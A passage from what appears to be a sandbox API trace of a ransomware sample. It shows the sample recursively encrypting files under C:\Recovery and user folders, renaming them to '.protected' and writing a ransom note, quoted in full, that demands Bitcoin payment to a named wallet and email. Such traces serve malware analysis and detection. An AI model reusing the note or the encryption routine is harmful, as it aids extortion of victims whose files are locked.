lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x295f3bc*, lpNumberOfBytesWritten=0x295f3e4*=0x4, lpOverlapped=0x0) returned 1 [0077.404] WriteFile (in: hFile=0xa4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f3e4*=0x30, lpOverlapped=0x0) returned 1 [0077.405] CloseHandle (hObject=0xa4) returned 1 [0077.405] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi.protected") returned 71 [0077.405] MoveFileW (lpExistingFileName="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi" (normalized: "c:\\recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi"), lpNewFileName="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi.protected" (normalized: "c:\\recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi.protected")) returned 1 [0077.406] FindNextFileW (in: hFindFile=0x47b910, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0077.406] lstrcmpiW (lpString1="Winre.wim", lpString2="Windows") returned 1 [0077.406] lstrcmpiW (lpString1="Winre.wim", lpString2="Program Files") returned 1 [0077.406] lstrcmpiW (lpString1="Winre.wim", lpString2="Program Files (x86)") returned 1 [0077.406] lstrcmpiW (lpString1="Winre.wim", lpString2="$Recycle.bin") returned 1 [0077.406] lstrcmpiW (lpString1="Winre.wim", lpString2="System Volume Information") returned 1 [0077.406] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim") returned 62 [0077.406] StrStrIW (lpFirst="Winre.wim", lpSrch=".protected") returned 0x0 [0077.406] lstrcmpW (lpString1="Winre.wim", lpString2="RESTORE_FILES.txt") returned 1 [0077.406] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f39c | out: pbBuffer=0x295f39c) returned 1 [0077.406] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x30) returned 1 [0077.406] CreateFileW (lpFileName="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim" (normalized: "c:\\recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\winre.wim"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0077.407] lstrlenW (lpString="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim") returned 62 [0077.407] StrStrW (lpFirst="Winre.wim", lpSrch=".txt") returned 0x0 [0077.407] lstrlenW (lpString="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim") returned 62 [0077.407] StrStrW (lpFirst="Winre.wim", lpSrch=".rar") returned 0x0 [0077.407] lstrlenW (lpString="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim") returned 62 [0077.407] StrStrW (lpFirst="Winre.wim", lpSrch=".zip") returned 0x0 [0077.407] ReadFile (in: hFile=0xa4, lpBuffer=0x49e450, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x49e450*, lpNumberOfBytesRead=0x295f3e4*=0x2800, lpOverlapped=0x0) returned 1 [0077.419] SetFilePointerEx (in: hFile=0xa4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.419] WriteFile (in: hFile=0xa4, lpBuffer=0x49e450*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x49e450*, lpNumberOfBytesWritten=0x295f3e4*=0x2800, lpOverlapped=0x0) returned 1 [0077.420] SetFilePointerEx (in: hFile=0xa4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.420] WriteFile (in: hFile=0xa4, lpBuffer=0x295f3bc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x295f3bc*, lpNumberOfBytesWritten=0x295f3e4*=0x4, lpOverlapped=0x0) returned 1 [0077.445] WriteFile (in: hFile=0xa4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f3e4*=0x30, lpOverlapped=0x0) returned 1 [0077.445] CloseHandle (hObject=0xa4) returned 1 [0077.446] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim.protected") returned 72 [0077.446] MoveFileW (lpExistingFileName="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim" (normalized: "c:\\recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\winre.wim"), lpNewFileName="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim.protected" (normalized: "c:\\recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\winre.wim.protected")) returned 1 [0077.446] FindNextFileW (in: hFindFile=0x47b910, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 0 [0077.446] FindClose (in: hFindFile=0x47b910 | out: hFindFile=0x47b910) returned 1 [0077.447] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\RESTORE_FILES.txt") returned 70 [0077.447] CreateFileW (lpFileName="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\RESTORE_FILES.txt" (normalized: "c:\\recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x104 [0077.490] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0077.490] WriteFile (in: hFile=0x104, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f3e4*=0x53d, lpOverlapped=0x0) returned 1 [0077.491] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0077.491] WriteFile (in: hFile=0x104, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f3e4*=0x2ac, lpOverlapped=0x0) returned 1 [0077.491] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0077.491] WriteFile (in: hFile=0x104, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f3e4*=0xb1, lpOverlapped=0x0) returned 1 [0077.491] CloseHandle (hObject=0x104) returned 1 [0077.492] FindNextFileW (in: hFindFile=0x447b60, lpFindFileData=0x295f670 | out: lpFindFileData=0x295f670) returned 0 [0077.492] FindClose (in: hFindFile=0x447b60 | out: hFindFile=0x447b60) returned 1 [0077.492] wnsprintfW (in: pszDest=0x459508, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Recovery\\RESTORE_FILES.txt") returned 33 [0077.492] CreateFileW (lpFileName="\\\\?\\C:\\Recovery\\RESTORE_FILES.txt" (normalized: "c:\\recovery\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xdc [0077.493] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0077.493] WriteFile (in: hFile=0xdc, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f654, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f654*=0x53d, lpOverlapped=0x0) returned 1 [0077.494] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0077.494] WriteFile (in: hFile=0xdc, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f654, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f654*=0x2ac, lpOverlapped=0x0) returned 1 [0077.494] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0077.494] WriteFile (in: hFile=0xdc, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f654, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f654*=0xb1, lpOverlapped=0x0) returned 1 [0077.494] CloseHandle (hObject=0xdc) returned 1 [0077.494] FindNextFileW (in: hFindFile=0x4472f8, lpFindFileData=0x295f8e0 | out: lpFindFileData=0x295f8e0) returned 1 [0077.494] lstrcmpiW (lpString1="System Volume Information", lpString2="Windows") returned -1 [0077.494] lstrcmpiW (lpString1="System Volume Information", lpString2="Program Files") returned 1 [0077.494] lstrcmpiW (lpString1="System Volume Information", lpString2="Program Files (x86)") returned 1 [0077.494] lstrcmpiW (lpString1="System Volume Information", lpString2="$Recycle.bin") returned 1 [0077.494] lstrcmpiW (lpString1="System Volume Information", lpString2="System Volume Information") returned 0 [0077.494] FindNextFileW (in: hFindFile=0x4472f8, lpFindFileData=0x295f8e0 | out: lpFindFileData=0x295f8e0) returned 1 [0077.494] lstrcmpiW (lpString1="Users", lpString2="Windows") returned -1 [0077.494] lstrcmpiW (lpString1="Users", lpString2="Program Files") returned 1 [0077.494] lstrcmpiW (lpString1="Users", lpString2="Program Files (x86)") returned 1 [0077.494] lstrcmpiW (lpString1="Users", lpString2="$Recycle.bin") returned 1 [0077.494] lstrcmpiW (lpString1="Users", lpString2="System Volume Information") returned 1 [0077.494] wnsprintfW (in: pszDest=0x4484b8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users") returned 12 [0077.494] lstrcmpW (lpString1="Users", lpString2=".") returned 1 [0077.494] lstrcmpW (lpString1="Users", lpString2="..") returned 1 [0077.494] wnsprintfW (in: pszDest=0x459508, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\*") returned 14 [0077.494] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\*", lpFindFileData=0x295f670 | out: lpFindFileData=0x295f670) returned 0x47b910 [0077.495] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0077.495] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0077.495] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0077.495] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0077.495] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0077.495] wnsprintfW (in: pszDest=0x459508, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\.") returned 14 [0077.495] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0077.495] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0077.495] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0077.495] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f60c | out: pbBuffer=0x295f60c) returned 1 [0077.495] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f634*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f634*=0x30) returned 1 [0077.495] CreateFileW (lpFileName="\\\\?\\C:\\Users\\." (normalized: "c:\\users\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0077.495] FindNextFileW (in: hFindFile=0x47b910, lpFindFileData=0x295f670 | out: lpFindFileData=0x295f670) returned 1 [0077.495] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0077.495] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0077.495] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0077.495] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0077.495] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0077.495] wnsprintfW (in: pszDest=0x459508, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\..") returned 15 [0077.495] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0077.495] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0077.495] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0077.495] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0077.495] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f60c | out: pbBuffer=0x295f60c) returned 1 [0077.496] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f634*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f634*=0x30) returned 1 [0077.496] CreateFileW (lpFileName="\\\\?\\C:\\Users\\.." (normalized: "c:"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0077.496] FindNextFileW (in: hFindFile=0x47b910, lpFindFileData=0x295f670 | out: lpFindFileData=0x295f670) returned 1 [0077.496] lstrcmpiW (lpString1="5p5NrGJn0jS HALPmcxz", lpString2="Windows") returned -1 [0077.496] lstrcmpiW (lpString1="5p5NrGJn0jS HALPmcxz", lpString2="Program Files") returned -1 [0077.496] lstrcmpiW (lpString1="5p5NrGJn0jS HALPmcxz", lpString2="Program Files (x86)") returned -1 [0077.496] lstrcmpiW (lpString1="5p5NrGJn0jS HALPmcxz", lpString2="$Recycle.bin") returned 1 [0077.496] lstrcmpiW (lpString1="5p5NrGJn0jS HALPmcxz", lpString2="System Volume Information") returned -1 [0077.496] wnsprintfW (in: pszDest=0x459508, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 33 [0077.496] lstrcmpW (lpString1="5p5NrGJn0jS HALPmcxz", lpString2=".") returned 1 [0077.496] lstrcmpW (lpString1="5p5NrGJn0jS HALPmcxz", lpString2="..") returned 1 [0077.496] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*") returned 35 [0077.496] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*", lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 0x47b950 [0077.496] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0077.496] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0077.496] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0077.496] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0077.496] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0077.496] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\.") returned 35 [0077.496] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0077.496] FindNextFileW (in: hFindFile=0x47b950, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0077.497] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0077.497] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0077.497] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0077.497] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0077.497] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0077.497] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\..") returned 36 [0077.497] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0077.497] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0077.497] FindNextFileW (in: hFindFile=0x47b950, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0077.497] lstrcmpiW (lpString1="AppData", lpString2="Windows") returned -1 [0077.497] lstrcmpiW (lpString1="AppData", lpString2="Program Files") returned -1 [0077.497] lstrcmpiW (lpString1="AppData", lpString2="Program Files (x86)") returned -1 [0077.497] lstrcmpiW (lpString1="AppData", lpString2="$Recycle.bin") returned 1 [0077.497] lstrcmpiW (lpString1="AppData", lpString2="System Volume Information") returned -1 [0077.497] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData") returned 41 [0077.497] lstrcmpW (lpString1="AppData", lpString2=".") returned 1 [0077.497] lstrcmpW (lpString1="AppData", lpString2="..") returned 1 [0077.497] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\*") returned 43 [0077.498] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0x47b990 [0077.498] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0077.498] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0077.498] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0077.498] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0077.498] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0077.498] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\.") returned 43 [0077.498] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0077.498] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0077.498] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0077.498] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0077.498] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0077.498] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0077.498] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0077.498] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0077.498] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0077.498] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0077.498] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0077.499] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0077.499] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\..") returned 44 [0077.499] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0077.499] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0077.499] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0077.499] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0077.499] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0077.499] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0077.499] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\.." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0077.499] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0077.499] lstrcmpiW (lpString1="Local", lpString2="Windows") returned -1 [0077.499] lstrcmpiW (lpString1="Local", lpString2="Program Files") returned -1 [0077.499] lstrcmpiW (lpString1="Local", lpString2="Program Files (x86)") returned -1 [0077.499] lstrcmpiW (lpString1="Local", lpString2="$Recycle.bin") returned 1 [0077.499] lstrcmpiW (lpString1="Local", lpString2="System Volume Information") returned -1 [0077.499] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 47 [0077.499] lstrcmpW (lpString1="Local", lpString2=".") returned 1 [0077.499] lstrcmpW (lpString1="Local", lpString2="..") returned 1 [0077.499] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\*") returned 49 [0077.499] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x47b9d0 [0077.500] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0077.500] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0077.500] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0077.500] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0077.500] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0077.500] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\.") returned 49 [0077.500] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0077.500] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 